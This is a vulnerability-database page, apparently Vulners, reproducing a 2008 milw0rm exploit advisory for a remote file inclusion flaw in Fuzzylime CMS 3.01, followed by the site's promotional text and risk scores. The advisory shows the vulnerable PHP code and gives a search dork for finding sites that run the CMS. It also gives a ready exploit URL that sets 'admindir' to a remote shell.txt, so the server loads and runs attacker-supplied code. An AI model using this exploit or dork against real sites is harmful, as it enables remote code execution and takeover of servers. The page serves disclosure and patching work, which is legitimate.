Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2008-1405 | 14 Mar 200800:00 | – | circl | |
| CVE-2008-1405 | 20 Mar 200810:00 | – | cve | |
| CVE-2008-1405 | 20 Mar 200810:00 | – | cvelist | |
| EUVD-2008-1409 | 7 Oct 202500:30 | – | euvd | |
| Immunity Canvas: FUZZYLIME_INCLUDE | 20 Mar 200810:44 | – | canvas | |
| CVE-2008-1405 | 20 Mar 200810:44 | – | nvd | |
| Remote file inclusion | 20 Mar 200810:44 | – | prion |
.-----------------------------------------------------------------------------.
| vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability |
| download: http://cms.fuzzylime.co.uk/ |
| dork: "powered by fuzzylime" |
| |
| author: [email protected] |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: cOndemned, str0ke, wacky |
'-----------------------------------------------------------------------------'
# code:
/code/display.php:
...
1 <?
2 $s = $_GET[s];
3 $p = $_GET[p];
4 $s = str_replace("../", "", $s);
5 $p = str_replace("../", "", $p);
6 if(empty($s)) $s = "front";
7 if(empty($p)) $p = "index";
8 $curs = $s;
9 $curp = $p;
10
11 include "code/settings.inc.php";
12 include "${admindir}/languages/english.inc.php";
...
line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D
# exploit:
http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?
# milw0rm.com [2008-03-14]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.34841